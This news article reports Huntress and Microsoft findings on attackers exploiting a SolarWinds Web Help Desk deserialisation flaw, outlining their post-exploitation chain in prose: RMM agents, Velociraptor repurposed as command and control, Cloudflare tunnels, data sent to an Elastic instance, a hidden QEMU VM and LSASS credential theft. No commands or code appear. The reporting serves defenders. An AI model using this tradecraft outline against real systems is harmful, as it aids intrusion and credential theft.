Researchers at Huntress Security have published new data on exploitation of a critical SolarWinds Web Help Desk (WHD) vulnerability, revealing how in at least three known incidents, attackers conducted extensive post-exploitation activity with a common set of tools, including legitimate services such as Zoho ManageEngine and Elastic
Tracked as CVE-2025-40551, the data deserialisation vulnerability was first flagged by SolarWinds on 28 January and last week, was added to the US Cybersecurity and Infrastructure Security Agency’s (Cisa) Known Exploited Vulnerabilities (Kev) resource mandating that US government bodies fix it immediately.
“Threat actors are actively weaponising WHD vulnerabilities to achieve remote code execution [RCE] and deploy additional tooling in victim environments,” said the Huntress team.
The research team at Huntress – which protects multiple SolarWinds customers through its channel – found that having broken into their victim environments, the attackers took control of WMD’s service wrapper to spawn the underlying Java application, which enabled them to install a payload, which was in fact a Zoho ManageEngine remote monitoring and management (RMM) agent.
This done, the threat actor used the RMM agent to execute several Active Directory discovery commands to enumerate the environment. Shortly after this, they opened a Zoho Assist remote session which they used to install the open source digital forensics and incident response (DFIR) tool Velociraptor.
“While Velociraptor is designed to help defenders with endpoint monitoring and artifact collection, its capabilities, such as remote command execution, file retrieval, and process execution via VQL queries, make it equally effective as a C2 [Command and Control] framework when pointed at attacker-controlled infrastructure,” said Huntress.
In the instances its team investigated, the attackers were actually using a rather outdated version of Velociraptor that itself contained a privilege escalation flaw disclosed in 2025. Moreover, the Velociraptor server infrastructure pointed back to a known Cloudflare account associated with the Warlock ransomware operation, a possible hint to the provenance of the campaign.
Alongside Velociraptor, the threat actor also downloaded Cloudflared, the command line client for Cloudflare Tunnel, likely in order to establish a second redundant means of access.
They then proceeded to execute a PowerShall script to collect system information – data such as operating system version, hardware spec, domain membership, installed hotfixes – that was exfiltrated to a legitimate Elastic Cloud instance being run as a free trial on Elastic’s software-as-a-service (SaaS) infrastructure.
The researchers said it was somewhat ironic that the threat actor had essentially built themselves a security information and event management (SIEM) solution on Elastic’s infrastructure to triage their victims.
“Elastic’s own tooling, typically used by defenders for threat hunting and incident response, was repurposed as an attacker’s victim management dashboard,” they said.
“We have reported this malicious instance to Elastic as well as law enforcement and performed victim notification and outreach to non-Huntress partners,” said the Huntress team.
Microsoft reports on further attacks
Huntress’ full write-up of its research, available to read in full here, details various other actions taken by the threat actor during the course of their intrusions. Meanwhile, in addition to these findings, Microsoft has published details of a similar multi-stage intrusion orchestrated via SolarWinds WHD, although it has not yet been able to establish whether or not the attackers exploited CVE-2025-40551 or CVE-2025-26399 – another RCE bug disclosed in September 2025 that bypassed a previously fixed flaw that in turn bypassed a third issue first flagged in 2024.
The incident investigated by Microsoft saw the attackers use the compromised WHD instance to spawn PowerShell in order to download and execute Zoho ManageEngine to gain control of the system after which they conducted recon activity while setting up reverse secure shell (SSH) and remote desktop protocol (RDP) access to maintain their bridgehead.
Microsoft also observed the attackers creating a scheduled task to launch a QEMU virtual machine under the SYSTEM account on startup, which essentially let them hide their activity within the virtualised environment. Huntress had also noted this in some instances.
On some hosts, Microsoft said the attackers also used dynamic link library (DLL) sideloading to gain access to Local Security Authority Subsystem Service (LSASS) memory in order to steal more credentials.
Besides patching and isolating compromised hosts, Microsoft is advising its users to evict any RMM artifacts, particularly any associated with ManageEngine, that may have been added after exploitation, and immediately rotate credentials for all service and admin accounts accessible from WHD.
